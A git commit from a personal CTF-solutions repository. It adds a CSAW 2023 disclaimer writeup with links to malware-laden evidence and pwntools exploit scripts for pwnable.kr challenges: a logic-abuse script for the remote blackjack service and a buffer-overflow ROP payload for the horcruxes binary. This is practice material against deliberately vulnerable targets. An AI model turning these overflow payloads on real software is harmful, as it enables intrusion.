some pwnable.kr sols+Prepare csaw sol template (the actual writeups aren't there dw organizers)

programmeruser2 · programmeruser2 · commit 4460ab47bf02 · 2023-09-17T18:30:16.000-04:00
diff --git a/.gitignore b/.gitignore
@@ -1,3 +1,4 @@
 */__pycache__/*
 __pycache__/
+libseccomp.so.2
 
diff --git a/csaw/2023/Disclaimer.md b/csaw/2023/Disclaimer.md
@@ -0,0 +1,14 @@
+# Disclaimer
+**Points: 0**
+**Category: Incident Response**
+> Please make sure to do your investigation on a machine that you don't mind having malware on as there will be some malware on these machines that will corrupt the data on your system. You have been warned! Please acknowledge this warning my putting in the following flag --> csawctf{I_will_be_careful_in_my_investigation}
+
+> Here is the link for all the evidence (zip file is about 22GB and the password is infected) --> https://infected-vm-challenge.s3.amazonaws.com/evidence.zip
+
+> Here is a link for a mirror in SE-Asia. If it's a closer region to you than US-East. Please try this link to speed it up --> https://infected-vm-asia-mirror.s3-accelerate.amazonaws.com/evidence.zip
+
+> Here is a link for a mirror in Europe. If it's a closer region to you than US-East. Please try this link to speed it up --> https://infected-vm-europe.s3-accelerate.amazonaws.com/evidence.zip
+
+> Big shoutout to Axel Mierczuk and Dhyey Shah (CTFd) for help in getting this challenge together
+
+Read the disclaimer message in the challenge description, and submit the flag given: `csawctf{I_will_be_careful_in_my_investigation}`.
diff --git a/csaw/2023/README.md b/csaw/2023/README.md
@@ -0,0 +1,6 @@
+# CSAW Quals 2023 
+Me and my team did this CTF and got 144th place with 1775 points.
+## Writeups 
+### Incident Response
+* [Disclaimer](./Disclaimer.md)
+
diff --git a/pwnable-kr/blackjack.py b/pwnable-kr/blackjack.py
@@ -0,0 +1,8 @@
+from pwn import *
+r = remote('pwnable.kr', 9009)
+r.sendline(b'y')
+r.sendline(b'1')
+for _ in range(2): r.sendline(str(10 ** 6).encode())
+r.interactive()
+# play the game until you win and get the flag: YaY_I_AM_A_MILLIONARE_LOL
+
diff --git a/pwnable-kr/flag b/pwnable-kr/flag
@@ -0,0 +1,2 @@
+ctf{test_flag}
+
diff --git a/pwnable-kr/horcruxes b/pwnable-kr/horcruxes
diff --git a/pwnable-kr/horcruxes.py b/pwnable-kr/horcruxes.py
@@ -0,0 +1,11 @@
+from pwn import *
+context.clear(arch='i386', os='linux')
+context.binary = e = ELF('./horcruxes')
+rop = b'a' * (0x74 + 4+1)
+# last gadget -> go back to ropme
+rop += p32(0x0809fffc) 
+print(rop)
+#r = gdb.debug('./horcruxes', 'break ropme')
+r = process('./horcruxes')
+r.sendline(rop)
+r.interactive()

Original file line number	Diff line number	Diff line change
`@@ -1,3 +1,4 @@`
`1`	`1`	`/__pycache__/`
`2`	`2`	`__pycache__/`
	`3`	`+libseccomp.so.2`
`3`	`4`